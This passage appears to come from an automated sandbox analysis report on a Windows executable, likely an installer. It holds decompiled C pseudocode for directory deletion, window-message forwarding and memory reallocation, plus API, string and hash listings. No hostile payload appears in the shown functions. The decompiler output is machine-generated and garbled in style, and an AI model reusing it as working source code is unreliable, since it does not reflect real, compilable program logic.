                                                            				if(_t103 == 0xffffffff || (_t103 & 0x00000010) == 0) {
                                                            					_v9 = 1;
                                                            					goto L18;
                                                            				} else {
                                                            					_v20 = _t106;
                                                            					_v16 = 0x11;
                                                            					E006163B4(L"Deleting directory: %s", _t76, 0,  &_v20, _t103, _t106);
                                                            					if((_t103 & 0x00000001) == 0) {
                                                            						L9:
                                                            						_t44 = E0060C664(_t76, _t106, _t117);
                                                            						asm("sbb eax, eax");
                                                            						_v9 = _t44 + 1;
                                                            						if(_v9 != 0) {
                                                            							L18:
                                                            							_pop(_t88);
                                                            							 *[fs:eax] = _t88;
                                                            							_push(E00628FC9);
                                                            							return E0040A1C8( &_v24);
                                                            						}
                                                            						_t104 = GetLastError();
                                                            						if(_v8 == 0) {
                                                            							__eflags = _a4;
                                                            							if(_a4 == 0) {
                                                            								L16:
                                                            								_v20 = _t104;
                                                            								_v16 = 0;
                                                            								E006163B4(L"Failed to delete directory (%d).", _t76, 0,  &_v20, _t104, _t106);
                                                            								goto L18;
                                                            							}
                                                            							_t50 = E00628C68(_a4, _t76, _t106, _t106);
                                                            							__eflags = _t50;
                                                            							if(_t50 == 0) {
                                                            								goto L16;
                                                            							}
                                                            							_t51 = E00429D18();
                                                            							__eflags = _t51 - 2;
                                                            							if(_t51 != 2) {
                                                            								goto L16;
                                                            							}
                                                            							_v20 = _t104;
                                                            							_v16 = 0;
                                                            							E006163B4(L"Failed to delete directory (%d). Will delete on restart (if empty).", _t76, 0,  &_v20, _t104, _t106);
                                                            							E00628D50(_t76, _t76, _t106, _t104, _t106);
                                                            							goto L18;
                                                            						}
                                                            						_v20 = _t104;
                                                            						_v16 = 0;
                                                            						E006163B4(L"Failed to delete directory (%d). Will retry later.", _t76, 0,  &_v20, _t104, _t106);
                                                            						E0040B29C();
                                                            						E0040B470( &_v24, _t106);
                                                            						E00610640(_v8, 0, _v24, _t122);
                                                            						goto L18;
                                                            					}
                                                            					_t115 = _t103 & 0x00000400;
                                                            					if((_t103 & 0x00000400) != 0) {
                                                            						L5:
                                                            						_t65 = E0060C6DC(_t76, 0xfffffffe & _t103, _t106, _t116);
                                                            						_t117 = _t65;
                                                            						if(_t65 == 0) {
                                                            							E00616130(L"Failed to strip read-only attribute.", _t76, _t103, _t106);
                                                            						} else {
                                                            							E00616130(L"Stripped read-only attribute.", _t76, _t103, _t106);
                                                            						}
                                                            						goto L9;
                                                            					}
                                                            					_t71 = E0060DFAC(_t76, _t76, _t106, _t106, _t115);
                                                            					_t116 = _t71;
                                                            					if(_t71 == 0) {
                                                            						E00616130(L"Not stripping read-only attribute because the directory does not appear to be empty.", _t76, _t103, _t106);
                                                            						goto L9;
                                                            					}
                                                            					goto L5;
                                                            				}
                                                            			}





















                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,00628FC2,?,00000000,?), ref: 00628F04
                                                              • Part of subcall function 0060DFAC: FindClose.KERNEL32(000000FF,0060E0A1), ref: 0060E090
                                                            Strings
                                                            • Failed to strip read-only attribute., xrefs: 00628ED2
                                                            • Deleting directory: %s, xrefs: 00628E8B
                                                            • Failed to delete directory (%d). Will delete on restart (if empty)., xrefs: 00628F7B
                                                            • Failed to delete directory (%d)., xrefs: 00628F9C
                                                            • Stripped read-only attribute., xrefs: 00628EC6
                                                            • Not stripping read-only attribute because the directory does not appear to be empty., xrefs: 00628EDE
                                                            • Failed to delete directory (%d). Will retry later., xrefs: 00628F1D
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: CloseErrorFindLast
                                                            • String ID: Deleting directory: %s$Failed to delete directory (%d).$Failed to delete directory (%d). Will delete on restart (if empty).$Failed to delete directory (%d). Will retry later.$Failed to strip read-only attribute.$Not stripping read-only attribute because the directory does not appear to be empty.$Stripped read-only attribute.
                                                            • API String ID: 754982922-1448842058
                                                            • Opcode ID: 7fc0813c7db3ed8f80165e3b8539aa30754377e7929e0533272f97a4bbcf9ceb
                                                            • Instruction ID: bb024c1df45f9af0c8d848e5c22ededdbf4d41f71593f538bf5593c1374477db
                                                            • Opcode Fuzzy Hash: 7fc0813c7db3ed8f80165e3b8539aa30754377e7929e0533272f97a4bbcf9ceb
                                                            • Instruction Fuzzy Hash: B5410330A11A285ECB00EB68DD053EE77E7AF84310F11842EB411D3382CFB48E45CBA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E005B8390(void* __eax, struct HWND__** __edx) {
                                                            				long _v20;
                                                            				intOrPtr _t17;
                                                            				intOrPtr _t30;
                                                            				void* _t46;
                                                            				void* _t50;
                                                            				struct HWND__** _t51;
                                                            				struct HWND__* _t52;
                                                            				struct HWND__* _t53;
                                                            				void* _t54;
                                                            				DWORD* _t55;
                                                            
                                                            				_t55 = _t54 + 0xfffffff8;
                                                            				_t51 = __edx;
                                                            				_t50 = __eax;
                                                            				_t46 = 0;
                                                            				_t17 =  *((intOrPtr*)(__edx + 4));
                                                            				if(_t17 < 0x100 || _t17 > 0x109) {
                                                            					L19:
                                                            					return _t46;
                                                            				} else {
                                                            					_t52 = GetCapture();
                                                            					if(_t52 != 0) {
                                                            						GetWindowThreadProcessId(_t52, _t55);
                                                            						GetWindowThreadProcessId( *(_t50 + 0x188),  &_v20);
                                                            						if( *_t55 == _v20 && SendMessageW(_t52, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
                                                            							_t46 = 1;
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            					_t53 =  *_t51;
                                                            					_t30 =  *((intOrPtr*)(_t50 + 0x58));
                                                            					if(_t30 == 0 || _t53 !=  *((intOrPtr*)(_t30 + 0x3c4))) {
                                                            						L7:
                                                            						if(E0050E9B4(_t53) == 0 && _t53 != 0) {
                                                            							_t53 = GetParent(_t53);
                                                            							goto L7;
                                                            						}
                                                            						if(_t53 == 0) {
                                                            							_t53 =  *_t51;
                                                            						}
                                                            						goto L11;
                                                            					} else {
                                                            						_t53 = E0051B414(_t30);
                                                            						L11:
                                                            						if(IsWindowUnicode(_t53) == 0) {
                                                            							if(SendMessageA(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
                                                            								_t46 = 1;
                                                            							}
                                                            						} else {
                                                            							if(SendMessageW(_t53, _t51[1] + 0xbc00, _t51[2], _t51[3]) != 0) {
                                                            								_t46 = 1;
                                                            							}
                                                            						}
                                                            						goto L19;
                                                            					}
                                                            				}
                                                            			}














                                                            APIs
                                                            • GetCapture.USER32 ref: 005B83B6
                                                            • IsWindowUnicode.USER32(00000000), ref: 005B83F9
                                                            • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8414
                                                            • SendMessageA.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8433
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 005B8442
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 005B8453
                                                            • SendMessageW.USER32(00000000,-0000BBEE,00000000,00000000), ref: 005B8473
                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            Similarity
                                                            • API ID: MessageSendWindow$ProcessThread$CaptureUnicode
                                                            • String ID:
                                                            • API String ID: 1994056952-0
                                                            • Opcode ID: 60d5d18c6536e8f3e7333ea3e87ccb02092badd8fb76314d68d3832b537e943d
                                                            • Instruction ID: fa2d834c3aada0f77e9407d785ac3e39b975c7e98aa55159218471e4f58a832a
                                                            • Opcode Fuzzy Hash: 60d5d18c6536e8f3e7333ea3e87ccb02092badd8fb76314d68d3832b537e943d
                                                            • Instruction Fuzzy Hash: 3C21BFB520460A6F9A60EA99CD40EE777DCFF44744B105829B999C3642DE14F840C765
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 88%
                                                            			E00405F80(signed int __eax, intOrPtr __edx, void* __edi) {
                                                            				signed int __ebx;
                                                            				void* __esi;
                                                            				signed int _t69;
                                                            				signed int _t78;
                                                            				signed int _t93;
                                                            				long _t94;
                                                            				void* _t100;
                                                            				signed int _t102;
                                                            				signed int _t109;
                                                            				signed int _t115;
                                                            				signed int _t123;
                                                            				signed int _t129;
                                                            				void* _t131;
                                                            				signed int _t140;
                                                            				unsigned int _t148;
                                                            				signed int _t150;
                                                            				long _t152;
                                                            				signed int _t156;
                                                            				intOrPtr _t161;
                                                            				signed int _t166;
                                                            				signed int _t170;
                                                            				unsigned int _t171;
                                                            				intOrPtr _t174;
                                                            				intOrPtr _t192;
                                                            				signed int _t195;
                                                            				signed int _t196;
                                                            				signed int _t197;
                                                            				void* _t205;
                                                            				unsigned int _t207;
                                                            				intOrPtr _t213;
                                                            				void* _t225;
                                                            				intOrPtr _t227;
                                                            				void* _t228;
                                                            				signed int _t230;
                                                            				void* _t232;
                                                            				signed int _t233;
                                                            				signed int _t234;
                                                            				signed int _t238;
                                                            				signed int _t241;
                                                            				void* _t243;
                                                            				intOrPtr* _t244;
                                                            
                                                            				_t176 = __edx;
                                                            				_t66 = __eax;
                                                            				_t166 =  *(__eax - 4);
                                                            				_t217 = __eax;
                                                            				if((_t166 & 0x00000007) != 0) {
                                                            					__eflags = _t166 & 0x00000005;
                                                            					if((_t166 & 0x00000005) != 0) {
                                                            						_pop(_t217);
                                                            						_pop(_t145);
                                                            						__eflags = _t166 & 0x00000003;
                                                            						if((_t166 & 0x00000003) == 0) {
                                                            							_push(_t145);
                                                            							_push(__eax);
                                                            							_push(__edi);
                                                            							_push(_t225);
                                                            							_t244 = _t243 + 0xffffffe0;
                                                            							_t218 = __edx;
                                                            							_t202 = __eax;
                                                            							_t69 =  *(__eax - 4);
                                                            							_t148 = (0xfffffff0 & _t69) - 0x14;
                                                            							if(0xfffffff0 >= __edx) {
                                                            								__eflags = __edx - _t148 >> 1;
                                                            								if(__edx < _t148 >> 1) {
                                                            									_t150 = E00405A04(__edx);
                                                            									__eflags = _t150;
                                                            									if(_t150 != 0) {
                                                            										__eflags = _t218 - 0x40a2c;
                                                            										if(_t218 > 0x40a2c) {
                                                            											_t78 = _t202 - 0x10;
                                                            											__eflags = _t78;
                                                            											 *((intOrPtr*)(_t78 + 8)) = _t218;
                                                            										}
                                                            										E004055C0(_t202, _t218, _t150);
                                                            										E00405D88(_t202, _t202, _t225);
                                                            									}
                                                            								} else {
                                                            									_t150 = __eax;
                                                            									 *((intOrPtr*)(__eax - 0x10 + 8)) = __edx;
                                                            								}
                                                            							} else {
                                                            								if(0xfffffff0 <= __edx) {
                                                            									_t227 = __edx;
                                                            								} else {
                                                            									_t227 = 0xbadb9d;
                                                            								}
                                                            								 *_t244 = _t202 - 0x10 + (_t69 & 0xfffffff0);
                                                            								VirtualQuery( *(_t244 + 8), _t244 + 8, 0x1c);
                                                            								if( *((intOrPtr*)(_t244 + 0x14)) != 0x10000) {
                                                            									L12:
                                                            									_t150 = E00405A04(_t227);
                                                            									__eflags = _t150;
                                                            									if(_t150 != 0) {
                                                            										__eflags = _t227 - 0x40a2c;
                                                            										if(_t227 > 0x40a2c) {
                                                            											_t93 = _t150 - 0x10;
                                                            											__eflags = _t93;
                                                            											 *((intOrPtr*)(_t93 + 8)) = _t218;
                                                            										}
                                                            										E00405590(_t202,  *((intOrPtr*)(_t202 - 0x10 + 8)), _t150);
                                                            										E00405D88(_t202, _t202, _t227);
                                                            									}
                                                            								} else {
                                                            									 *(_t244 + 0x10) =  *(_t244 + 0x10) & 0xffff0000;
                                                            									_t94 =  *(_t244 + 0x10);
                                                            									if(_t218 - _t148 >= _t94) {
                                                            										goto L12;
                                                            									} else {
                                                            										_t152 = _t227 - _t148 + 0x00010000 - 0x00000001 & 0xffff0000;
                                                            										if(_t94 < _t152) {
                                                            											_t152 = _t94;
                                                            										}
                                                            										if(VirtualAlloc( *(_t244 + 0xc), _t152, 0x2000, 4) == 0 || VirtualAlloc( *(_t244 + 0xc), _t152, 0x1000, 4) == 0) {
                                                            											goto L12;
                                                            										} else {
                                                            											_t100 = _t202 - 0x10;
                                                            											 *((intOrPtr*)(_t100 + 8)) = _t218;
                                                            											 *(_t100 + 0xc) = _t152 +  *(_t100 + 0xc) | 0x00000008;
                                                            											_t150 = _t202;
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            							return _t150;
                                                            						} else {
                                                            							__eflags = 0;
                                                            							return 0;
                                                            						}
                                                            					} else {
                                                            						_t170 = _t166 & 0xfffffff0;
                                                            						_push(__edi);
                                                            						_t205 = _t170 + __eax;
                                                            						_t171 = _t170 - 4;
                                                            						_t156 = _t166 & 0x0000000f;
                                                            						__eflags = __edx - _t171;
                                                            						_push(_t225);
                                                            						if(__edx > _t171) {
                                                            							_t102 =  *(_t205 - 4);
                                                            							__eflags = _t102 & 0x00000001;
                                                            							if((_t102 & 0x00000001) == 0) {
                                                            								L75:
                                                            								asm("adc edi, 0xffffffff");
                                                            								_t228 = ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176;
                                                            								_t207 = _t171;
                                                            								_t109 = E00405A04(((_t171 >> 0x00000002) + _t171 - _t176 & 0) + _t176);
                                                            								_t192 = _t176;
                                                            								__eflags = _t109;
                                                            								if(_t109 == 0) {
                                                            									goto L73;
                                                            								} else {
                                                            									__eflags = _t228 - 0x40a2c;
                                                            									if(_t228 > 0x40a2c) {
                                                            										 *((intOrPtr*)(_t109 - 8)) = _t192;
                                                            									}
                                                            									_t230 = _t109;
                                                            									E00405590(_t217, _t207, _t109);
                                                            									E00405D88(_t217, _t207, _t230);
                                                            									return _t230;
                                                            								}
                                                            							} else {
                                                            								_t115 = _t102 & 0xfffffff0;
                                                            								_t232 = _t171 + _t115;
                                                            								__eflags = __edx - _t232;
                                                            								if(__edx > _t232) {
                                                            									goto L75;
                                                            								} else {
                                                            									__eflags =  *0x6cf05d;
                                                            									if(__eflags == 0) {
                                                            										L66:
                                                            										__eflags = _t115 - 0xb30;
                                                            										if(_t115 >= 0xb30) {
                                                            											E004055DC(_t205);
                                                            											_t176 = _t176;
                                                            											_t171 = _t171;
                                                            										}
                                                            										asm("adc edi, 0xffffffff");
                                                            										_t123 = (_t176 + ((_t171 >> 0x00000002) + _t171 - _t176 & 0) + 0x000000d3 & 0xffffff00) + 0x30;
                                                            										_t195 = _t232 + 4 - _t123;
                                                            										__eflags = _t195;
                                                            										if(_t195 > 0) {
                                                            											 *(_t217 + _t232 - 4) = _t195;
                                                            											 *((intOrPtr*)(_t217 - 4 + _t123)) = _t195 + 3;
                                                            											_t233 = _t123;
                                                            											__eflags = _t195 - 0xb30;
                                                            											if(_t195 >= 0xb30) {
                                                            												__eflags = _t123 + _t217;
                                                            												E0040561C(_t123 + _t217, _t171, _t195);
                                                            											}
                                                            										} else {
                                                            											 *(_t217 + _t232) =  *(_t217 + _t232) & 0xfffffff7;
                                                            											_t233 = _t232 + 4;
                                                            										}
                                                            										_t234 = _t233 | _t156;
                                                            										__eflags = _t234;
                                                            										 *(_t217 - 4) = _t234;
                                                            										 *0x6cfaec = 0;
                                                            										_t109 = _t217;
                                                            										L73:
                                                            										return _t109;
                                                            									} else {
                                                            										while(1) {
                                                            											asm("lock cmpxchg [0x6cfaec], ah");
                                                            											if(__eflags == 0) {
                                                            												break;
                                                            											}
                                                            											asm("pause");
                                                            											__eflags =  *0x6cf98d;
                                                            											if(__eflags != 0) {
                                                            												continue;
                                                            											} else {
                                                            												Sleep(0);
                                                            												_t176 = _t176;
                                                            												_t171 = _t171;
                                                            												asm("lock cmpxchg [0x6cfaec], ah");
                                                            												if(__eflags != 0) {
                                                            													Sleep(0xa);
                                                            													_t176 = _t176;
                                                            													_t171 = _t171;
                                                            													continue;
                                                            												}
                                                            											}
                                                            											break;
                                                            										}
                                                            										_t156 = 0x0000000f &  *(_t217 - 4);
                                                            										_t129 =  *(_t205 - 4);
                                                            										__eflags = _t129 & 0x00000001;
                                                            										if((_t129 & 0x00000001) == 0) {
                                                            											L74:
                                                            											 *0x6cfaec = 0;
                                                            											goto L75;
                                                            										} else {
                                                            											_t115 = _t129 & 0xfffffff0;
                                                            											_t232 = _t171 + _t115;
                                                            											__eflags = _t176 - _t232;
                                                            											if(_t176 > _t232) {
                                                            												goto L74;
                                                            											} else {
                                                            												goto L66;
                                                            											}
                                                            										}
                                                            									}
                                                            								}
                                                            							}
                                                            						} else {
                                                            							__eflags = __edx + __edx - _t171;
                                                            							if(__edx + __edx < _t171) {
                                                            								__eflags = __edx - 0xb2c;
                                                            								if(__edx >= 0xb2c) {
                                                            									L41:
                                                            									_t32 = _t176 + 0xd3; // 0xbff
                                                            									_t238 = (_t32 & 0xffffff00) + 0x30;
                                                            									_t174 = _t171 + 4 - _t238;
                                                            									__eflags =  *0x6cf05d;
                                                            									if(__eflags != 0) {
                                                            										while(1) {
                                                            											asm("lock cmpxchg [0x6cfaec], ah");
                                                            											if(__eflags == 0) {
                                                            												break;
                                                            											}
                                                            											asm("pause");
                                                            											__eflags =  *0x6cf98d;
                                                            											if(__eflags != 0) {
                                                            												continue;
                                                            											} else {
                                                            												Sleep(0);
                                                            												_t174 = _t174;
                                                            												asm("lock cmpxchg [0x6cfaec], ah");
                                                            												if(__eflags != 0) {
                                                            													Sleep(0xa);
                                                            													_t174 = _t174;
                                                            													continue;
                                                            												}
                                                            											}
                                                            											break;
                                                            										}
                                                            										_t156 = 0x0000000f &  *(_t217 - 4);
                                                            										__eflags = 0xf;
                                                            									}
                                                            									 *(_t217 - 4) = _t156 | _t238;
                                                            									_t161 = _t174;
                                                            									_t196 =  *(_t205 - 4);
                                                            									__eflags = _t196 & 0x00000001;
                                                            									if((_t196 & 0x00000001) != 0) {
                                                            										_t131 = _t205;
                                                            										_t197 = _t196 & 0xfffffff0;
                                                            										_t161 = _t161 + _t197;
                                                            										_t205 = _t205 + _t197;
                                                            										__eflags = _t197 - 0xb30;
                                                            										if(_t197 >= 0xb30) {
                                                            											E004055DC(_t131);
                                                            										}
                                                            									} else {
                                                            										 *(_t205 - 4) = _t196 | 0x00000008;
                                                            									}
                                                            									 *((intOrPtr*)(_t205 - 8)) = _t161;
                                                            									 *((intOrPtr*)(_t217 + _t238 - 4)) = _t161 + 3;
                                                            									__eflags = _t161 - 0xb30;
                                                            									if(_t161 >= 0xb30) {
                                                            										E0040561C(_t217 + _t238, _t174, _t161);
                                                            									}
                                                            									 *0x6cfaec = 0;
                                                            									return _t217;
                                                            								} else {
                                                            									__eflags = __edx - 0x2cc;
                                                            									if(__edx < 0x2cc) {
                                                            										_t213 = __edx;
                                                            										_t140 = E00405A04(__edx);
                                                            										__eflags = _t140;
                                                            										if(_t140 != 0) {
                                                            											_t241 = _t140;
                                                            											E004055C0(_t217, _t213, _t140);
                                                            											E00405D88(_t217, _t213, _t241);
                                                            											_t140 = _t241;
                                                            										}
                                                            										return _t140;
                                                            									} else {
                                                            										_t176 = 0xb2c;
                                                            										__eflags = _t171 - 0xb2c;
                                                            										if(_t171 <= 0xb2c) {
                                                            											goto L37;
                                                            										} else {
                                                            											goto L41;
                                                            										}
                                                            									}
                                                            								}
                                                            							} else {
                                                            								L37:
                                                            								return _t66;
                                                            							}
                                                            						}
                                                            					}
                                                            				} else {
                                                            					__ebx =  *__ecx;
                                                            					__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                            					__ecx = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            					__eflags = __ecx - __edx;
                                                            					if(__ecx < __edx) {
                                                            						__ecx = __ecx + __ecx + 0x20;
                                                            						_push(__edi);
                                                            						__edi = __edx;
                                                            						__eax = 0;
                                                            						__ecx = __ecx - __edx;
                                                            						asm("adc eax, 0xffffffff");
                                                            						__eax = 0 & __ecx;
                                                            						__eax = (0 & __ecx) + __edx;
                                                            						__eax = E00405A04((0 & __ecx) + __edx);
                                                            						__eflags = __eax;
                                                            						if(__eax != 0) {
                                                            							__eflags = __edi - 0x40a2c;
                                                            							if(__edi > 0x40a2c) {
                                                            								 *(__eax - 8) = __edi;
                                                            							}
                                                            							 *(__ebx + 2) & 0x0000ffff = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            							__eflags = ( *(__ebx + 2) & 0x0000ffff) - 4;
                                                            							__edx = __eax;
                                                            							__edi = __eax;
                                                            							 *((intOrPtr*)(__ebx + 0x1c))() = E00405D88(__esi, __edi, __ebp);
                                                            							__eax = __edi;
                                                            						}
                                                            						_pop(__edi);
                                                            						_pop(__esi);
                                                            						_pop(__ebx);
                                                            						return __eax;
                                                            					} else {
                                                            						__ebx = 0x40 + __edx * 4;
                                                            						__eflags = 0x40 + __edx * 4 - __ecx;
                                                            						if(0x40 + __edx * 4 < __ecx) {
                                                            							__ebx = __edx;
                                                            							__eax = __edx;
                                                            							__eax = E00405A04(__edx);
                                                            							__eflags = __eax;
                                                            							if(__eax != 0) {
                                                            								__ecx = __ebx;
                                                            								__edx = __eax;
                                                            								__ebx = __eax;
                                                            								__esi = E00405D88(__esi, __edi, __ebp);
                                                            								__eax = __ebx;
                                                            							}
                                                            							_pop(__esi);
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						} else {
                                                            							_pop(__esi);
                                                            							_pop(__ebx);
                                                            							return __eax;
                                                            						}
                                                            					}
                                                            				}
                                                            			}












































                                                            0x004061c3
                                                            0x004061b9
                                                            0x00406168
                                                            0x0040615b
                                                            0x00406039
                                                            0x0040603c
                                                            0x0040603e
                                                            0x00406048
                                                            0x0040604e
                                                            0x00406065
                                                            0x00406065
                                                            0x00406071
                                                            0x00406077
                                                            0x00406079
                                                            0x00406080
                                                            0x00406082
                                                            0x00406087
                                                            0x0040608f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406091
                                                            0x00406093
                                                            0x0040609a
                                                            0x00000000
                                                            0x0040609c
                                                            0x0040609f
                                                            0x004060a4
                                                            0x004060aa
                                                            0x004060b2
                                                            0x004060b7
                                                            0x004060bc
                                                            0x00000000
                                                            0x004060bc
                                                            0x004060b2
                                                            0x00000000
                                                            0x0040609a
                                                            0x004060c5
                                                            0x004060c5
                                                            0x004060c5
                                                            0x004060ca
                                                            0x004060cd
                                                            0x004060cf
                                                            0x004060d2
                                                            0x004060d5
                                                            0x004060e0
                                                            0x004060e2
                                                            0x004060e5
                                                            0x004060e7
                                                            0x004060e9
                                                            0x004060ef
                                                            0x004060f1
                                                            0x004060f1
                                                            0x004060d7
                                                            0x004060da
                                                            0x004060da
                                                            0x004060f6
                                                            0x004060fc
                                                            0x00406100
                                                            0x00406106
                                                            0x0040610d
                                                            0x0040610d
                                                            0x00406112
                                                            0x0040611f
                                                            0x00406050
                                                            0x00406050
                                                            0x00406056
                                                            0x00406120
                                                            0x00406124
                                                            0x00406129
                                                            0x0040612b
                                                            0x0040612d
                                                            0x00406135
                                                            0x0040613c
                                                            0x00406141
                                                            0x00406141
                                                            0x00406147
                                                            0x0040605c
                                                            0x0040605c
                                                            0x00406061
                                                            0x00406063
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406063
                                                            0x00406056
                                                            0x00406040
                                                            0x00406040
                                                            0x00406044
                                                            0x00406044
                                                            0x0040603e
                                                            0x00406033
                                                            0x00405f90
                                                            0x00405f90
                                                            0x00405f92
                                                            0x00405f96
                                                            0x00405f99
                                                            0x00405f9b
                                                            0x00405fd4
                                                            0x00405fd8
                                                            0x00405fd9
                                                            0x00405fdb
                                                            0x00405fdd
                                                            0x00405fdf
                                                            0x00405fe2
                                                            0x00405fe4
                                                            0x00405fe6
                                                            0x00405feb
                                                            0x00405fed
                                                            0x00405fef
                                                            0x00405ff5
                                                            0x00405ff7
                                                            0x00405ff7
                                                            0x00405ffe
                                                            0x00405ffe
                                                            0x00406001
                                                            0x00406003
                                                            0x0040600c
                                                            0x00406011
                                                            0x00406011
                                                            0x00406013
                                                            0x00406014
                                                            0x00406015
                                                            0x00406016
                                                            0x00405f9d
                                                            0x00405f9d
                                                            0x00405fa4
                                                            0x00405fa6
                                                            0x00405fac
                                                            0x00405fae
                                                            0x00405fb0
                                                            0x00405fb5
                                                            0x00405fb7
                                                            0x00405fb9
                                                            0x00405fbb
                                                            0x00405fbd
                                                            0x00405fc8
                                                            0x00405fcd
                                                            0x00405fcd
                                                            0x00405fcf
                                                            0x00405fd0
                                                            0x00405fd1
                                                            0x00405fa8
                                                            0x00405fa8
                                                            0x00405fa9
                                                            0x00405faa
                                                            0x00405faa
                                                            0x00405fa6
                                                            0x00405f9b

                                                            Memory Dump Source
                                                            • Source File: 00000006.00000002.317730068.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000006.00000002.317725489.0000000000400000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318066673.00000000006C5000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318073516.00000000006CA000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318079756.00000000006CC000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318085304.00000000006CE000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318091437.00000000006CF000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318097233.00000000006D4000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318107258.00000000006D9000.00000008.00020000.sdmp
                                                            • Associated: 00000006.00000002.318112284.00000000006DB000.00000004.00020000.sdmp
                                                            • Associated: 00000006.00000002.318118585.00000000006DC000.00000002.00020000.sdmp
                                                            • Associated: 00000006.00000002.318123129.00000000006DE000.00000002.00020000.sdmp
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                            • Instruction ID: 5d66737b0d4da92f98c0db807105cf356bd4b4b1c4874a50b8b8aa415a59ee3b
                                                            • Opcode Fuzzy Hash: 833c993916d0d18284627c8ebcb851e0d3f6b00a19ef6d1fc725f28c20042ba8
                                                            • Instruction Fuzzy Hash: D1C134A2710A004BD714AB7D9C8476FB286DBC5324F19823FE645EB3D6DA7CCC558B88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 62%
                                                            			E006158C4(void* __ebx, int* __edx, void* __edi, void* __esi, void* __fp0) {
                                                            				char _v8;
                                                            				char _v12;
                                                            				int* _v16;
                                                            				char _v144;
                                                            				intOrPtr _v148;
                                                            				void* _v152;
                                                            				intOrPtr _v156;
                                                            				char _v168;
                                                            				char _v172;
                                                            				void* _t51;
                                                            				intOrPtr* _t57;
                                                            				intOrPtr* _t62;
                                                            				intOrPtr* _t65;
                                                            				intOrPtr* _t71;
                                                            				intOrPtr _t77;
                                                            				void* _t104;
                                                            				void* _t107;
                                                            				int* _t108;
                                                            				struct HWND__* _t118;
                                                            				int _t122;
                                                            				intOrPtr _t152;
                                                            				intOrPtr _t156;
                                                            				intOrPtr _t157;
                                                            				intOrPtr _t162;
                                                            				struct HWND__* _t163;
                                                            				intOrPtr _t164;
                                                            				intOrPtr _t165;
                                                            				intOrPtr _t166;
                                                            				intOrPtr _t169;
                                                            				intOrPtr _t172;
                                                            				intOrPtr _t176;
                                                            				void* _t181;
                                                            				void* _t182;
                                                            				intOrPtr _t183;
                                                            				void* _t189;
                                                            
                                                            				_t189 = __fp0;
                                                            				_t179 = __esi;
                                                            				_t178 = __edi;
                                                            				_t181 = _t182;
                                                            				_t183 = _t182 + 0xffffff58;
                                                            				_push(__esi);
                                                            				_push(__edi);
                                                            				_v172 = 0;
                                                            				_v8 = 0;
                                                            				_v12 = 0;
                                                            				_v16 = __edx;
                                                            				_push(_t181);
                                                            				_push(0x615c7e);
                                                            				_push( *[fs:eax]);
                                                            				 *[fs:eax] = _t183;
                                                            				_push(_t181);
                                                            				_push(0x615c40);
                                                            				_push( *[fs:edx]);
                                                            				 *[fs:edx] = _t183;
                                                            				_t122 =  *_v16;
                                                            				_t51 = _t122 - 0x4a;
                                                            				if(_t51 == 0) {
                                                            					_t53 = _v16[2];
                                                            					_t152 =  *(_v16[2]) - 0x800;
                                                            					__eflags = _t152;
                                                            					if(__eflags == 0) {
                                                            						_push(_t181);
                                                            						_push(0x615a6b);
                                                            						_push( *[fs:edx]);
                                                            						 *[fs:edx] = _t183;
                                                            						E0040A350( &_v8,  *(_t53 + 4) >> 1,  *((intOrPtr*)(_t53 + 8)), __eflags);
                                                            						_push(_t181);
                                                            						_push(0x615a29);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t183;
                                                            						_t57 =  *0x6cd8cc; // 0x6d681c
                                                            						 *_t57 =  *_t57 + 1;
                                                            						_push(_t181);
                                                            						_push(0x615a0e);
                                                            						_push( *[fs:eax]);
                                                            						 *[fs:eax] = _t183;
                                                            						L006ABD3C(_v8,  *(_t53 + 4) >> 1,  &_v12);
                                                            						_pop(_t156);
                                                            						 *[fs:eax] = _t156;
                                                            						_push(E00615A15);
                                                            						_t62 =  *0x6cd8cc; // 0x6d681c
                                                            						 *_t62 =  *_t62 - 1;
                                                            						__eflags =  *_t62;
                                                            						return _t62;
                                                            					} else {
                                                            						_t157 = _t152 - 1;
                                                            						__eflags = _t157;
                                                            						if(_t157 == 0) {
                                                            							_push(_t181);
                                                            							_push(0x615b61);
                                                            							_push( *[fs:edx]);
                                                            							 *[fs:edx] = _t183;
                                                            							E0040714C( *((intOrPtr*)(_t53 + 8)), _t122, 0x98,  &_v168);
                                                            							_push(_t181);
                                                            							_push(0x615b1f);
                                                            							_push( *[fs:eax]);
                                                            							 *[fs:eax] = _t183;
                                                            							_t65 =  *0x6cdb4c; // 0x6d682c
